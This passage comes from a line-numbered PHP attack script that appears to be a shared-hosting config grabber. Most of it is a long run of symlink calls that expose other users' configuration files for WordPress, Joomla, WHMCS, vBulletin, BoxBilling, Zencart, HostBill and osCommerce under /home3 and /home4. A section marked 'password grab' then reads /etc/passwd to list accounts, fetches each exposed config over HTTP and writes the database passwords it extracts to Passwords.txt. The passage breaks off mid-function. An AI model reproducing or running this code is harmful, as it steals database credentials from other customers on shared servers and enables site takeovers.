  1358. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1359. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1360. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1361. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1362. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1363. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1364. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1365. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1393. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1394. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1395. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1396. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1397. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1398. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1399. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1400. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1401. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1402. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1403. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1404. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1405. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1406. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1407. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1408. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1409. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1410. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1411. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1412. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1413. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1414. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1415. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1416. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1417. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1418. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1419. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1420. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1421. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1422. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1423. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1424. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1425. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1426. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1427. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1428. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1429. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1430. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1431. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1432. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1433. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1434. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1435. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1436. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1437. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1438. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1439. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1440. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1441. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1442. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1443. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1444. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1445.  
  1446. //Home4
  1447.  
  1448. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1449. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1450. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1451. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1452. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1453. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1454. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1455. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1456. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1457. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1458. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1459. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1460. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1461. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1462. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1463. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1464. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1465. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1466. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1467. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1468. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1469. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1470. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1471. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1472. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1473. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1474. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1475. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1476. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1477. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1478. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1479. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1480. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1481. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1482. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1483. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1484. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1485. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1486. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1487. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1488. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1489. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1490. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1491. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1492. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1493. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1494. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1495. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1496. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1497. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1498. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1499. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1500. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1501. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1502. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1503. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1504. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1505. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1506. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1507. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1508. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1509. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1510. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1511. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1512. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1513. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1514. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1515. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1516. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1517. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1518. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1519. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1520. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1521. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1522. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1523. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1524. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1525. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1526. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1527. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1528. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1529. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1530. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1531. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1532. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1533. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1534. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1535. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1536. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1537. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1538. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1539. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1540. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1541. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1542. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1543. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1544. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1545. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1546. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1547. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1548. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1549. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1576. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1577. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1578. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1579. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1580. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1581. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1582. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1583. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1584. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1585. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1586. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1587. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1588. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1589. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1590. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1591. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1592. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1593. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1594. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1595. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1596. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1597. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1598. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1599. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1600. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1601. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1602. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1603. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1604. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1605. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1606. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1607. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1608. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1609. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1610. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1611. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1612. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1613. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1614. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1615. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1616. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1617. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1618. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1619. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1620. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1621. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1622. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1623. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1624. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1625. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1626. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1627. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1628.  
  1629. }
  1630.  
  1631. //password grab
  1632.  
  1633. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  1634. {
  1635.  
  1636. $ar0=explode($marqueurDebutLien, $text);
  1637. $ar1=explode($marqueurFinLien, $ar0[1]);
  1638. $ar=trim($ar1[0]);
  1639. return $ar;
  1640. }
  1641.  
  1642. $ffile=fopen('Passwords.txt','a+');
  1643.  
  1644.  
  1645. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/GX_symconf/";
  1646. $re=$r;
  1647. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  1648.  
  1649. $users=file("/etc/passwd");
  1650. foreach($users as $user)
  1651. {
  1652.  
  1653. $str=explode(":",$user);
  1654. $usersss=$str[0];
  1655. foreach($confi as $co)
  1656. {
  1657.  
  1658.  
  1659. $uurl=$re.$usersss.$co;
  1660. $uel=$uurl;
  1661.  
  1662. $ch = curl_init();
  1663.  
  1664. curl_setopt($ch, CURLOPT_URL, $uel);
  1665. curl_setopt($ch, CURLOPT_HEADER, 1);
  1666. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1667. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1668. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  1669. $result['EXE'] = curl_exec($ch);
  1670. curl_close($ch);
  1671. $uxl=$result['EXE'];
  1672.  
  1673.  
  1674. if($uxl && preg_match('/table_prefix/i',$uxl))
  1675. {
  1676.  
  1677. //Wordpress
  1678.  
  1679. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  1680. if(!empty($dbp))
  1681. $pass=$dbp."\n";
  1682. fwrite($ffile,$pass);
  1683.  
  1684. }
  1685. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  1686. {
  1687.  
  1688. //WHMCS
  1689.  
  1690. $dbp=entre2v2($uxl,"db_password = '","';");
  1691. if(!empty($dbp))
  1692. $pass=$dbp."\n";
  1693. fwrite($ffile,$pass);
  1694.  
  1695. }
  1696.  
  1697.  
  1698. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  1699. {
  1700.  
  1701. //Joomla
  1702.  
  1703. $db=entre2v2($uxl,"password = '","';");
  1704. if(!empty($db))
  1705. $pass=$db."\n";
  1706. fwrite($ffile,$pass);
  1707. }
  1708. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  1709. {
  1710.  
  1711. //Vbulletin
  1712.  
  1713. $db=entre2v2($uxl,"password'] = '","';");
  1714. if(!empty($db))
  1715. $pass=$db."\n";
  1716. fwrite($ffile,$pass);
  1717.  
  1718. }
  1719. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  1720. {
  1721.  
  1722. //Other
  1723.  
  1724. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  1725. if(!empty($db))
  1726. $pass=$db."\n";
  1727. fwrite($ffile,$pass);
  1728. }
  1729. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1730. {
  1731.  
  1732. //Other
  1733.  
